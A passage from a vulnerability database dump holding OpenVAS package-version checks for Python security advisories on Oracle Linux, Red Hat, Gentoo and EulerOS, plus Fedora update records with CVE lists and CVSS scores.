\"CVE-2014-1912\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"python27\", rpm:\"python27~1.1~20.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python\", rpm:\"python27-python~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-debug\", rpm:\"python27-python-debug~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-devel\", rpm:\"python27-python-devel~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-libs\", rpm:\"python27-python-libs~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-pip\", rpm:\"python27-python-pip~1.5.6~5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-setuptools\", rpm:\"python27-python-setuptools~0.9.8~5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-simplejson\", rpm:\"python27-python-simplejson~3.2.0~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-test\", rpm:\"python27-python-test~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-tools\", rpm:\"python27-python-tools~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-wheel\", rpm:\"python27-python-wheel~0.24.0~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-runtime\", rpm:\"python27-runtime~1.1~20.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-scldevel\", rpm:\"python27-scldevel~1.1~20.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-tkinter\", rpm:\"python27-tkinter~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"python27\", rpm:\"python27~1.1~17.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python\", rpm:\"python27-python~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-debug\", rpm:\"python27-python-debug~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-devel\", rpm:\"python27-python-devel~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-libs\", rpm:\"python27-python-libs~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-pip\", rpm:\"python27-python-pip~1.5.6~5.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-setuptools\", rpm:\"python27-python-setuptools~0.9.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-simplejson\", rpm:\"python27-python-simplejson~3.2.0~2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-test\", rpm:\"python27-python-test~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-tools\", rpm:\"python27-python-tools~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-wheel\", rpm:\"python27-python-wheel~0.24.0~2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-runtime\", rpm:\"python27-runtime~1.1~17.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-scldevel\", rpm:\"python27-scldevel~1.1~17.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-tkinter\", rpm:\"python27-tkinter~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:56:26", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-11-20T00:00:00", "type": "openvas", "title": "RedHat Update for python RHSA-2015:2101-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871501", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871501", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for python RHSA-2015:2101-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871501\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-11-20 06:24:47 +0100 (Fri, 20 Nov 2015)\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\",\n \"CVE-2014-7185\", \"CVE-2014-9365\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for python RHSA-2015:2101-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Python is an interpreted, interactive,\nobject-oriented programming language often compared to Tcl, Perl, Scheme, or\nJava. Python includes modules, classes, exceptions, very high level dynamic\ndata types and dynamic typing. Python supports interfaces to many system calls\nand libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and\nMFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib)\ndid not perform verification of TLS/SSL certificates when connecting to\nHTTPS servers. A man-in-the-middle attacker could use this flaw to hijack\nconnections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable\ncertificate verification by default. However, for backwards compatibility,\nverification remains disabled by default. Future updates may change this\ndefault. Refer to the Knowledgebase article 2039753 linked to in the\nReferences section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs:\n\n * Subprocesses used with the Eventlet library or regular threads previously\ntried to close epoll file descriptors twice, which led to an 'Invalid\nargument' error. Subprocesses h ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"python on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:2101-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-November/msg00019.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-debuginfo\", rpm:\"python-debuginfo~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-devel\", rpm:\"python-devel~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-libs\", rpm:\"python-libs~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:49", "description": "Gentoo Linux Local Security Checks GLSA 201503-10", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201503-10", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1912", "CVE-2014-2667", "CVE-2013-7338", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-9365"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121364", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121364", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201503-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121364\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:40 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201503-10\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Python. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201503-10\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-7338\", \"CVE-2014-1912\", \"CVE-2014-2667\", \"CVE-2014-4616\", \"CVE-2014-7185\", \"CVE-2014-9365\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201503-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 3.3.5-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.9-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.10\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.11\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.12\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.13\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.14\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.15\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(), vulnerable: make_list(\"lt 3.3.5-r1\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:39:52", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for python (EulerOS-SA-2019-1434)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2183", "CVE-2019-9636", "CVE-2016-0772", "CVE-2013-4238", "CVE-2018-1060", "CVE-2009-2408", "CVE-2016-5636", "CVE-2019-9948", "CVE-2014-7185", "CVE-2018-1061", "CVE-2018-14647", "CVE-2014-4616", "CVE-2013-1752", "CVE-2019-5010", "CVE-2017-1000158", "CVE-2016-5699", "CVE-2014-9365"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191434", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191434", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1434\");\n script_version(\"2020-01-23T11:46:15+0000\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-4238\", \"CVE-2014-4616\", \"CVE-2014-7185\", \"CVE-2014-9365\", \"CVE-2016-0772\", \"CVE-2016-2183\", \"CVE-2016-5636\", \"CVE-2016-5699\", \"CVE-2017-1000158\", \"CVE-2018-1060\", \"CVE-2018-1061\", \"CVE-2018-14647\", \"CVE-2019-5010\", \"CVE-2019-9636\", \"CVE-2019-9948\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:46:15 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:46:15 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for python (EulerOS-SA-2019-1434)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1434\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1434\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'python' package(s) announced via the EulerOS-SA-2019-1434 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was found that Python's smtplib library did not return an exception when StartTLS failed to be established in the SMTP.starttls() function. A man in the middle attacker could strip out the STARTTLS command without generating an exception on the Python SMTP client application, preventing the establishment of the TLS layer.(CVE-2016-0772)\n\nA vulnerability was discovered in Python, in the built-in zipimporter. A specially crafted zip file placed in a module path such that it would be loaded by a later 'import' statement could cause a heap overflow, leading to arbitrary code execution.(CVE-2016-5636)\n\nA flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite.(CVE-2016-2183)\n\nThe Python standard library HTTP client modules (such as httplib or urllib) did not perform verification of TLS/SSL certificates when connecting to HTTPS servers. A man-in-the-middle attacker could use this flaw to hijack connections and eavesdrop or modify transferred data.(CVE-2014-9365)\n\nAn integer overflow flaw was found in the way the buffer() function handled its offset and size arguments. An attacker able to control those arguments could use this flaw to disclose portions of the application memory or cause it to crash.(CVE-2014-7185)\n\nA flaw was found in the way catastrophic backtracking was implemented in python's pop3lib's apop() method. An attacker could use this flaw to cause denial of service.(CVE-2018-1060)\n\nThe ssl.match_hostname function in the SSL module in Python 2.6 through 3.4 does not properly handle a '\\\\0' character in a domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.(CVE-2013-4238)\n\nIt was found that the Python's httplib library (used by urllib, urllib2 and others) did not properly check HTTPConnection.putheader() function arguments. An attacker could use this flaw to inject additional headers in a Python application that allowed user provided header names or values.(CVE-2016-5699)\n\nCPython (aka Python) up to 2.7.13 is vulnerable to an integer overflow in the PyString_DecodeEscape function in stringobject.c, resulting in heap-based buffer overflow (and possible arbitrary code execution)(CVE-2017-1000158)\n\nA flaw was found in the way cat ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'python' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~69.h19\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-devel\", rpm:\"python-devel~2.7.5~69.h19\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-libs\", rpm:\"python-libs~2.7.5~69.h19\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-tools\", rpm:\"python-tools~2.7.5~69.h19\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tkinter\", rpm:\"tkinter~2.7.5~69.h19\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "description": "Python is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC). Programmers can write new built-in modules for Python in C or C++. Python can be used as an extension language for applications that need a programmable interface. Note that documentation for Python is provided in the python-docs package. This package provides the \"python\" executable; most of the actual implementation is within the \"python-libs\" package. ", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2014-06-30T10:31:50", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: python-2.7.5-13.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2014-06-30T10:31:50", "id": "FEDORA:F219C21A3D", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especi ally how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. ", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-11-10T06:36:31", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: python3-3.4.1-16.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2014-11-10T06:36:31", "id": "FEDORA:AE30560F3A00", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Python is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC). Programmers can write new built-in modules for Python in C or C++. Python can be used as an extension language for applications that need a programmable interface. Note that documentation for Python is provided in the python-docs package. This package provides the \"python\" executable; most of the actual implementation is within the \"python-libs\" package. ", "edition": 2, "cvss3": {}, "published": "2014-07-17T04:29:36", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python-2.7.5-13.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4238", "CVE-2014-4616"], "modified": "2014-07-17T04:29:36", "id": "FEDORA:096D7228ED", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especi ally how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. ", "edition": 2, "cvss3": {}, "published": "2014-07-17T04:28:18", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python3-3.3.2-9.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", 